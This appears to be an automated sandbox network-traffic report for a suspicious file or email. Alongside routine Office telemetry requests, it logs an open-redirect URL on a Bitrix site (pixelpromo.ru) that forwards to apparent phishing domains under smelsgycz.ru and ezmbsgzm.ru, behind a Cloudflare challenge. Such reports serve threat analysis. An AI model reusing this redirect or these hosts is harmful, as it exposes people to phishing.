Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/ HTTP/1.1Host: www.pixelpromo.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.pixelpromo.ru
Source: global trafficDNS traffic detected: DNS query: or.smelsgycz.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru
Source: global trafficDNS traffic detected: DNS query: cdn.graph.office.net
Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3212sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: .jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:34:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EyngLd2fJaB82tWFgYpHbGqFWSVHVHs38o7MhS9gAy%2BtvEJVbrqUjwnljvvp7h%2FYT%2Bbr1t6nsc5eMWjheLMxMhgs8amKl5bBPSRYo6DX94itmI4W1dQ7M4XOyCKRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4894&min_rtt=4889&rtt_var=1385&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2230&delivery_rate=577804&cwnd=235&unsent_bytes=0&cid=6f7dd8c03aeb717b&ts=45&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8ef3a87dbc220c82-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1524&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1895&delivery_rate=1862244&cwnd=208&unsent_bytes=0&cid=4efb28806579f1f6&ts=658&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:34:49 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: f51Op0Aw0n/lw4a8dM/2sJ6pv27ffXLNMFM=$KwJLTYyQrPdYC81ucache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ef3a8858e5d4235-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:34:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 7u6cPorpNbRZRBSJ7XJNy2xBWokZKVoEkbA=$r0ukT1wXfqpeRAreServer: cloudflareCF-RAY: 8ef3a8ad9cf58cb7-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:35:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 7KVhGVwmNZbj1cL60QQiVvUwnJU5khJ6mEs=$69LP4EgPpihXJJ2rServer: cloudflareCF-RAY: 8ef3a8f5ce6a41d2-EWRalt-svc: h3=":443"; ma=86400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49791 version: TLS 1.2
